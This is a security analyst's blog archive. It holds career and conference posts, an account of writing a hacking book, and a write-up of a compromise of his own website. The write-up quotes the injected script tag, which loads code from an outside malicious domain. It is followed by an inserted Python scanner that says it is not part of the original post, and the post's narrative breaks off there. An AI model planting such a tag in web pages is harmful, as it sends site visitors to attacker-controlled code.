Brian Baskin's Site (FWIW)
Closing Out 2011
Last Updated on Sunday, 15 January 2012 13:32 Written by Brian Baskin Sunday, 01 January 2012 13:35
It's been quite a few months since my last post, but this has definitely been a hectic and busy year. It's mostly due to that schedule that I've been unable to post anything interesting since... April. Wow.
When 2011 started I was just a few months into my new job with cmdLabs, a truly life-changing event. I still enjoy my time with Eoghan, Chris, and Terry and incredibly love what I do. It was only about a year ago when I felt completely helpless, bored, and unchallenged with my old employer. The technical challenges weren't coming, and I spent most of my time performing management tasks where the largest difficulties were to organize large spreadsheets, though I did volunteer for the job so I don't have too much of a right to complain. I sought out every opportunity with the outside to keep my feet grounded in technical work. With my continuing time at cmdLabs, that's changed dramatically. Each case was a fun and intricate challenge, and I was surrounded by the best to bounce ideas off of on a regular basis.
While working with cmdLabs the opportunity was open to provide forensic support to the Defense Computer Forensics Laboratory (DCFL). It took quite a few months for that to take place, but I finally joined the ranks there in early September. DCFL is a part of DC3 (Defense Cyber Crime Center), where I've been since 2000. However, I was always in the training side and not in the lab, and now the veil has been opened.
I took a spot in the Intrusions and Information Assurance division (I2A) as an intrusion analyst. There, I analyze network servers and employee systems to detect traces of an intrusion and determine: how it occurred, what was stolen, and where the data was sent to. I've done this work for years, but it's mostly here to preen me for malware analysis. I had not spent any time in a debugger since probably 1997, and had not touched x86 assembly since that time, but it came back almost like riding a bike. So, in between intrusion cases, I analyze malware and complex encoding/encryption algorithms.
It is no surprise that this is some of the most completely challenging and complex work I've ever done. I think back to the joy of performing penetration testing on servers and the rush of "popping a box", and realized that it doesn't compare with rewriting a large mathematical algorithm full of bitwise math to decode a new encoding method used to mask the exfiltration of data. Then to open up a 5GB PCAP capture, apply the logic through code, and flay open the data into actual files and documents. Now THAT is a rush.
However, the first rule of defense work is that you don't talk about defense work. My social interactions have diminished greatly, mostly due to not having access to personal electronics or regular websites during working hours. As someone who loves to code new projects and release code and processes, I've had to place much of my personal commentary under self-scrutiny. And, when in doubt, bite my tongue and move on.
During the year I was roped into joining the General Dynamics - AIS (GD-AIS) team on the Maryland Cyber Challenge (MDC3 - no relation to DC3). This was a three-round contest that focused on blue-team, red-team, and forensics. For the blue-team exercise our team of six broke into two teams of three to focus on securing a Linux and Windows server, with myself on the Linux team. We passed that round and went into the Forensics round, which unfortunately occurred the same weekend I was at Derbycon - two hours after my talk, in fact. The staff at Derbycon kindly let me set up in the press room to work on the challenge remotely. Being remote on my Mac limited my abilities, but the challenge had a fair number of encoding and encryption challenges that I was able to break, and we passed the round. The final round was live at the Baltimore Conference Center, and was a bit of a shock. Up until 24 hours before the challenge we were told it was a full Capture the Flag with blue and red teaming. The day before we learned that it was full red-team, so we had to quickly adjust and retrain our team. We were easily outskilled by other competitors, but we placed decently.
For 2011 I stuck myself out there, much to the complaint of my introverted self. When the CFP for Defcon was about to wrap up, I decided to put together a talk called "Walking the Green Mile: How to Get Fired From Your Job After a Security Incident". A silly title, but I really suck at naming talks. The talk was about my increasing frustration in how many security practitioners were not doing their jobs right before, during, and after a security incident. As someone who has worked for years with many companies to respond to a security incident (including insiders, intrusions, and malware), I kept running into the same mistakes being made over and over. The talk was summarizing those mistakes in a way for others to learn to stop making them.
I first submitted the talk to Defcon, then Security BSides Vegas. I was declined for Defcon, which I expected, and was ecstatic at being selected for BSides. I was already volunteering to work on the security team there, so was already "in", but being able to speak was the icing on the cake. I also gave the talk at Defcon Skytalks, an unrecorded, off the record room at Defcon.
"That wasn't so bad", I told myself. So, I submitted for Derbycon and was surprised to be accepted there as well. Derbycon was a first year conference that was perfectly orchestrated. It was also, in my opinion, the best rendition of my talk that I had given; maybe because I didn't realize that I was being recorded until afterward.
I then finished up my speaking circuit at the local BSides Delaware, which went pretty great. But, it was after this event that I just grew tired of speaking. Too many talks in the year than what I was accustomed to. And, for me, every time I get on podium I'm anxiously awaiting someone to stand up, scream out, or do something to show how wrong I am and how I shouldn't be up talking. Then afterward, I crash from the stress and am usually mentally exhausted for hours. So, likely no voluntary conference talks for me in 2012.
However, that won't be so easy to escape. I start off 2012 at the DoD Cyber Crime Conference. There I will be "teaching" two pre-conference training courses. I was originally billed to teach the Carrier File Analysis course (malware analysis of PDF, CHM, compound documents, SWF, etc). Staffing issues meant that I now am doing half-teaching of that course and the Introduction to Malware Analysis, which occurs simultaneously. So it looks like I'll be running back and forth between the two sold-out classes for four days. While there I will also be giving my Intelligence Gathering Over Twitter talk for the second year. It will be an update from last year, on tools and methods to obtain information about a target on Twitter and their associations. Group analysis, friend analysis, metadata, and metasites (twitpic, etc). After that, I'll be done for 2012 :)
I will still be trying to volunteer for BSides events for Vegas and Delaware, and planning on attending ShmooCon, Defcon, BSides Vegas, Derbycon, and BSides Delaware. I'm going to make a push to finally attend RECon this year. But, being on-site full-time makes taking time off difficult, so I have to carefully pick and choose my cons.
Looking forward to new challenges in the upcoming year. Life is definitely more of a roller coaster ride now!
Analysis of Web-based Malware Attack
Last Updated on Tuesday, 17 May 2011 15:09 Written by Brian Baskin Thursday, 07 April 2011 17:52
The very nature of being a website on the Internet means that eventually it would be susceptible to an attack. Wordpress and blog sites are notoriously targeted with infections that append code to HTML files that point them to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.
Notification came by way of Twitter when a friend notified me that my site was redirecting to somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:
I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.
The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:
<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>
With the infection spotted, I checked the file's MAC times to see when the attack occurred:
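The check described above (a foreign script tag injected before the document's own markup, then the file's MAC times), written up as an added example; this is not code from the original post, and the web root, the site's own host name and the injected URL are constructed placeholders:

```python
import os
import re
import tempfile
from datetime import datetime, timezone
from urllib.parse import urlparse

# Matches a <script src="..."> tag; the captured group is the URL it loads.
SCRIPT_SRC_RE = re.compile(r'<script[^>]*\bsrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)

HTML_EXTENSIONS = {".htm", ".html", ".php"}


def injected_script_urls(text, own_hosts, head_chars=512):
    """Return off-site script URLs found at the very start of an HTML document.

    The incident on this page injected a single <script> line before the
    document's own markup, so only the leading portion of the file is examined.
    Relative src values (no host) and the site's own hosts are ignored.
    """
    own_hosts = {h.lower() for h in own_hosts}
    hits = []
    for url in SCRIPT_SRC_RE.findall(text[:head_chars]):
        host = urlparse(url).hostname
        if host and host.lower() not in own_hosts:
            hits.append(url)
    return hits


def mac_times(path):
    """Return the file's modified/accessed/changed times as ISO-8601 UTC strings."""
    st = os.stat(path)

    def fmt(ts):
        return datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()

    return {"mtime": fmt(st.st_mtime), "atime": fmt(st.st_atime), "ctime": fmt(st.st_ctime)}


def scan_webroot(webroot, own_hosts):
    """Walk `webroot` and report HTML files that begin with an off-site <script> tag.

    Each finding carries the file path, the foreign URLs, and the MAC times a
    responder would look at next to bracket when the modification happened.
    """
    findings = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            if os.path.splitext(name)[1].lower() not in HTML_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read(4096)
            urls = injected_script_urls(text, own_hosts)
            if urls:
                findings.append({"path": path, "urls": urls, **mac_times(path)})
    return findings


def build_sample_webroot():
    """Create a constructed web root: one clean page and one with an injected tag."""
    root = tempfile.mkdtemp(prefix="webroot_")
    clean = "<html><head><title>Home</title></head><body>ok</body></html>\n"
    # Constructed sample injection; the domain is a placeholder, not a real indicator.
    injected = ('<script src="http://malicious.example/nl.php?p=1"></script>\n'
                "<html><head><title>Books</title></head><body>list</body></html>\n")
    with open(os.path.join(root, "index.htm"), "w", encoding="utf-8") as fh:
        fh.write(clean)
    with open(os.path.join(root, "books.htm"), "w", encoding="utf-8") as fh:
        fh.write(injected)
    return root


if __name__ == "__main__":
    root = build_sample_webroot()
    for finding in scan_webroot(root, {"www.example.com"}):
        print(finding["path"], finding["urls"], finding["mtime"], finding["ctime"])
```

A legitimate third-party script (a CDN-hosted library, for instance) will also be reported; the list is a triage queue for the responder, not a verdict.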
2010 - A Year of Great Conferences
Last Updated on Friday, 31 December 2010 21:52 Written by Brian Baskin Saturday, 11 December 2010 18:05
A huge change in careers
Last Updated on Monday, 08 November 2010 21:36 Written by Brian Baskin Thursday, 04 November 2010 14:10
I am just finishing up my first week at my new place of employment, cmdLabs, LLC. What an amazing roller coaster ride.
Let's revisit the past ten years... just to get it off my mind and on paper.
It was with very mixed feelings that I left my former employer, where I had been employed for over 10 years. In late 1999 and early 2000 I was working as a network engineer at a NASDAQ data center near Washington, DC, suffering through the daily commutes. Through a friend I learned of a government facility where they were teaching computer forensics and investigations. It was outside of my skill set, but something I wanted passionately to be involved in. So, I made the leap to join CSC on the Defense Computer Investigations Training Program (DCITP) contract, as it was known at the time (now called the Defense Cyber Investigations Training Academy - DCITA), part of the Defense Cyber Crime Center (DC3). The downside to the move? I had to start at the ground floor. I started as classroom technical support. It was literally starting at the bottom rung of the ladder.
I did my work, head down, and found new ways to improve upon processes. I built databases, performed research, and eventually became a research aide to many of the instructors. When they got stumped by a hard question from a student, I would receive a pager message (yes, we had text pagers back then), and would try to get an answer within five minutes. After about a year of hard work, I raised the question - Let me teach. Let me start small, by teaching a hardware block of the introduction class. After a month or two of deliberation, they decided to give me a one-hour block teaching motherboard technology, with it recorded and reviewed by the government customer. I went up and did my thing - 15 minutes into the presentation slicing my arm with a sharp solder leg and bleeding out. I casually grabbed a towel used for cleaning the white board, placed it on my arm, and used a demo motherboard to apply pressure - all without missing a step and without the students even being aware (AFAIK).
I was given the job of being an instructor, and I started grabbing modules to teach. Within a year I had mastered all of the hardware/software/OS lessons of our core course and was the sole expert on the Linux section (being a user since 1994). Eventually, my need for more outgrew the class and I was moved to the Incident Responders team, where I started renovating their methods of Linux/Solaris incident response. I grew out from there into the Forensics material where I focused on host-based application artifacts. I then moved into Intrusions where I worked to renovate the Solaris Intrusion Response (FISE) course and build a new Linux Intrusion Response (FILE) course.
And all that in the space of just four years. I was working with Johnny Long on rebuilding our online investigations material, and we redesigned the course into new territories. Based upon much of my research, Johnny approached me with a side project. A Syngress project on IM/P2P security had lost an author and they needed someone to write the P2P analysis section, quickly. I then started researching and writing the Gnutella, Kazaa, and BitTorrent sections of the book, having them complete in just a month. And so began my side-career of being a "closer" for Syngress, but that's another story... But the research from that time, and since, has helped me become a premier P2P forensics researcher.
Eventually, by 2006, I had a mastery of the courses and was hitting a wall. At that point I was promoted to the Deputy Lead Technical Engineer position. I worked to review and authorize content changes to all of our courses. I performed extensive research on new forensic responses, next to Johnny who did research on new attacks, and then integrated the research into our training materials.
I also worked special projects for most of that period. When something huge came down the road, I was pulled to knock it out. One example was when, in 2008, the US Secret Service came to our customer with a huge project. They were establishing a brand new forensic school house in Alabama called the NCFI, where they would train state and locals in digital forensics. They asked us to develop seven courses with scenarios, instructor guides, PowerPoints, and handbooks, in a matter of six months. I was placed as the team lead and given four extensively qualified instructors to knock out the project. Which we did, on time and greatly under budget.
It was a dream job. It was my dream job. Yet, I left. Why? I pretty much hit my peak there. The projects that were coming down the line were less technical and less cutting-edge. They were more compliance-based to ensure we had standardized formats and guides. A lot of great technical work was still in process, but not enough to scratch my itch. After so many years there, I knew what was coming, and there were no big surprises left. So, it was very difficult to say goodbye to my family at CSC and DC3. A facility full of the brightest people doing great work. I feel like I've played a big hand in growing DCITA and DC3 to where it is today. I realize this sounds like I'm bragging of my work there, but it's just to show how strongly I feel about my family there.
I have moved on to become a Senior Consultant with cmdLabs, a wholly-owned subsidiary of The Newberry Group. I joined as the first real employee under the three partners: Eoghan Casey, Terrance Maguire, and Chris Daywalt. It's an exciting adventure, working out of cmdLabs' forensic lab in downtown Baltimore, but an opportunity to go the next step. This will literally be a ground floor operation to build out its capabilities, explore new forensic trenches, and have fun in the process.
What is there to learn from this? Do something you care about! Work in a field in which you are passionate! If you're not there right now, then get there. And realize that sometimes that takes a sacrifice. Don't expect that every new job is going to be an increase. You will take pay cuts, benefit cuts, and other sacrifices. But those are minor when compared to doing work that gives your life new meaning. Stop looking for a job that pays $10K more and look for one that you will gladly wake up every morning to do. And when, at a point, you've exhausted your stretch at one place, don't feel confined there. Seek out to improve yourself.
And to my friends with CSC/DC3. I will definitely miss you. But, as you all know, this is an extremely small community.
Dissecting the Hack: A How-To
Last Updated on Friday, 23 July 2010 00:59 Written by Brian Baskin Monday, 19 July 2010 21:33
This month the revised edition of Dissecting the Hack: The F0rb1dd3n Network was released to the public. This is an awesome moment to finally put a major project to rest and look forward to the future (and any potential bad reviews :))
The back story is full of enough gossip to almost equal that of the LIGATT controversy. Without going into details, Jayson Street worked up a plan for a fictional hacker story with a technical reference section to explain the techniques used in the story. However, as Jayson worked to finish the fictional side before the deadline, they contacted someone to work up the technical portion. The person that wrote the technical, non-fiction portion copied much of the material from public sources without citation or attribution. From what I've learned, this is the kiss of death in the publishing world, a huge scandal that can cause a major setback for a company. His book had a technical editor, whose job it is to ensure that the material is original, clean, and appropriate for the tone of the book. The technical editor also wrote the technical material, normally a line that isn't crossed. It was a situation that everyone thought would go cleanly, but didn't.
What follows here is basically what occurred after that point. Some details have been omitted, others glossed over, and overall it was a great experience.
Let's Do This Thing
When Jayson Street was surprised about the plagiarism late on a Friday night, news hit the InfoSec Twitter world hard. Accusations were flying and he stuck around to put forth his side of the story. During this time, he was in talks with Marcus Carey who helped talk him off the ledge and work on a strategy for moving forward. A few days later, Marcus calls me at home to fill me in on the situation and the new strategy: Marcus would be re-writing the technical portion and they wanted me to act as the technical editor. I looked at my work load, and family load (my wife had JUST delivered a baby, with me assisting, the Tuesday after the story broke) and decided that I could help.
Time went by. DojoSecs were scheduled, Marcus and I both gave talks at TechnoForensics, DojoCon kicked off, and lots of life events occurred. There were many offers of assistance from others in the field, but the process needed to be tight and clean, with formal contracts for everyone. So, many offers of assistance just couldn't be accepted.
Towards December, Jayson and Marcus crafted together a genius idea: play out the story in real life through Twitter and web servers. They spent weeks organizing the events and time lines, crafting scripts, registering domains, with Marcus putting together a guide on how the reader can follow along in the real world. The reader can actually perform the reconnaissance steps used in the story to see how the attacks could be done. A sandbox was created for the reader to play in.
It was an excellent idea, but it required a lot of time and effort. And, through its development, it caused the manuscript to become very late. Now, obviously, a publisher is not happy with late deadlines. Syngress had a goal in mind to get the book printed and on shelves by the time ShmooCon hit in early February. At ShmooCon, we were just finishing up our final edits. Egg on us, but it really was to make a better product. Still... egg. Communications should have been better.
Then, as part of the final review cycle, issues arose. The editors didn't like the way that the material was flowing. Marcus's content relied on keeping material simple and approachable, and was full of personal anecdotes. Many thought the non-fiction would be better off in a very tight structure, instead of the loose story-telling that it currently was in.
And so, after many months of effort, the call was made to scrap the material and be done with the book.
Rewind
I don't hold anything against Syngress. They were fully within their rights, and their timelines had already slipped. The book had moved into dangerous territory and they were trying to protect their company. However, we didn't back down. At the end of February, after emails, phone calls, and conference calls, they agreed to let us have another go at it - with very strict rules.
They needed a new technical writer to write the material, and I turned it down. Life was too hectic, work was WAY too hectic, and I was taking two college courses. After a few days, though, I was notified that there wasn't much luck finding a new writer and the book would likely die.
So, at this point, I would be the primary writer. A new technical editor would be found to review the material. Syngress also brought in a development editor to review the material for any copyright or legal issues, with the lead editor also reviewing material. There would now be almost half a dozen eyes on every sentence throughout the process. And, we had a month to complete the process.
Beware the Ides of March
It was an aggressive schedule, to be sure. It was a large sacrifice, and a large amount of effort, but the only other choice was to let the book die and lose everything. And I would never be able to live with myself if that occurred.
Syngress hashed out a structure for me to follow, assigned staff, and we started working. I had to go at a fairly fast clip, but generally averaged one page per hour. Even pages with images followed that same rate, as the images had to be prepared exactly right. My personal goal was to hit out 10 pages a day, with weekends being great writing days. I worked in chunks. Chapters 1, 2, and 3 came first. I would finish chapter 1 (Recon), submit it for review, and then immediately started on 2. After 2 was complete, I'd submit it and work on 3. By the time 3 was nearing completion, my first reviews on 1 would return with changes I needed to make. The actual development time on a single chapter, including research and writing, was around 3-4 days.
After the first three chapters were done, we then set them in stone and moved onto the last few. It was late into this process that Dustin Trammell (I)ruid) came on board to perform the technical editing and he was a godsend. He took to my prose with a scalpel and smoothed out the flow, fixed grammar issues I didn't even notice, and helped carve out my very comma-friendly writing. (I love to use commas a lot, and it's a habit I've been trying to fight). I don't think I)ruid really knew how fast the bus was going that was about to run him over :)
We then went through a barrage of image copyrights. Everything was scrutinized to determine if it could be used. Many images were pulled from the content when all was said and done, some due to just the amount of time it would take to get a signed release. Some groups allowed us to reprint images from their websites and products, and I greatly appreciated the effort. A few knew of the previous situation and put in stipulations that the old technical editor would not, in any way, be working on the new book. They didn't want their good names tainted with a scandal, which I can definitely appreciate and understand.
Work continued on. I was putting in 45-50 hour work weeks in my day job, spending 9-10 hours a week commuting, and 8-9 hours a week taking college courses. I then spent nearly every spare moment I had writing. I would lock myself in the basement as soon as I came home, coming up only for a brief 30 minute dinner, then back to work. Work would end around 11PM every night, I'd get ready for bed, then up the next morning at 0430 to start all over again. When all was said and done, I had logged over 300 hours into the project.
In the middle of the month I also volunteered as a judge for the MidAtlantic Collegiate Cyber Defense Competition. An awesome experience, one that I enjoyed immensely, as I worked with two college blue teams with their technical questions and incident response forms. But, it logistically hurt. It took place on two days in which I was off from work, so I had to give up two good writing days. My solution was to stay at a hotel next to the building to avoid the 2 hours/day commute and focus on the writing.
Work load increased. Every review cycle brought new, hard-hitting questions. Errors were found, issues needed resolution, tempers flared. Jayson Street and I talked 2-5 times a day through email or phone, motivating each other through the process. Jayson was already providing needful advice through the process, helping me unravel the story and understand the motivations and techniques. We commiserated together as he was going through his cancer treatment at the time, but at least the jokes never stopped coming.
Things get serious
Halfway through the month of March things got serious. It was a Sunday night, the day before my first big deadline, and I froze in my seat. A hot, searing pain radiated through my body, starting from my chest and along my left arm and upper back. My first thought was that I was having a heart attack. I had just lost my brother-in-law (Christopher Byrne, RIP) in January of 2009 at the age of 32 to a heart attack, and I had just turned 30. My family was upstairs, I was in the basement, and I couldn't move. The pain increased, and I could barely breathe. Then, unusually, the pain continued. From my scant experience I figured the pain would be quick and done, but it actually lasted for over two hours. At that time, I could breathe and walk again, but was still in constant pain. I went to bed, hiding my affliction from my family.
The next morning I woke up in serious pain, still. I told my wife, then drove to an urgent care center. A quick electrocardiogram and they couldn't see anything wrong and referred me to a cardiologist. To make a long story short, the pain lasted for seven weeks in intervals lasting from an hour to five hours long. After an echocardiogram and stress test, the doctor could find nothing wrong. His diagnosis: "calm the hell down and stop getting so stressed" (that was verbatim, I liked that doctor :)).
Help, Marcus!
During much of this process, Marcus went offline. While he was rebuilding himself (with the assistance of P90X), he took some time off the Internet. Marcus was still a very central person to the entire project and he needed his place in the project. As part of the brainstorming he and Jayson had around Christmas, they devised a plan for various interviews on Information Security to be transcribed into the book. The first such interview was done with Dan Kaminsky at ShmooCon, with the video made available soon after on the Internet.
After weeks of effort, Jayson and Marcus were able to secure interviews with many of the great celebrities in our industry: Jeff Moss (who I had the pleasure of meeting at our DoD Cyber Crime Conference), Johnny Long (always a pleasure to include a friend), and Marcus Ranum (who had recently given an insightful presentation at a DojoSec). There was a lot of pressure on Marcus and Jayson to get the releases in place, schedule the interviews with Marcus Carey, and to manually transcribe all of the text, but the results were impressive!
On Reflection
When the book was all said and done, the pressure dropped immensely. I had the chance to review the work and mostly liked what I had created. There were issues the editors brought up that I tried to resolve, some better than others. Suggestions made by I)ruid were well received and resolved. There were some exceptions where great suggestions were made that I just could not complete due to exhaustion, and the mental roadblock of taking a 100% chapter and moving it back to 90%. Wish I could, wish I had, but we'll see how it hurts the book.
In April they estimated the book would be out by the week of Black Hat, which made everyone happy. To have the book available at Black Hat and DEFCON for sales was a BIG THING. Our fingers were crossed.
And then, it came! On July 1 my wife was presented with a surprise package from Syngress. It was the book! I rushed home that evening and looked at the book in its pristine shrink wrap... then packed it back away, unopened. It was too much to take. All the blood, sweat, and tears that went into the book came back to my mind. Opening this book would be a final confirmation that it was over, that we could move on. And I just couldn't do it.
It took me almost a week, with persuasion from my wife and from Jayson, before I finally opened the book and flipped through. There was the image of .ronin and his VERA-NG rifle from ShmooCon, the review of CP's Advanced Dork Firefox add-on, the stories from my own past experience. It was over. It wasn't perfect. It wasn't easy. It was the largest pro bono project I've ever done. But, it was well worth the effort.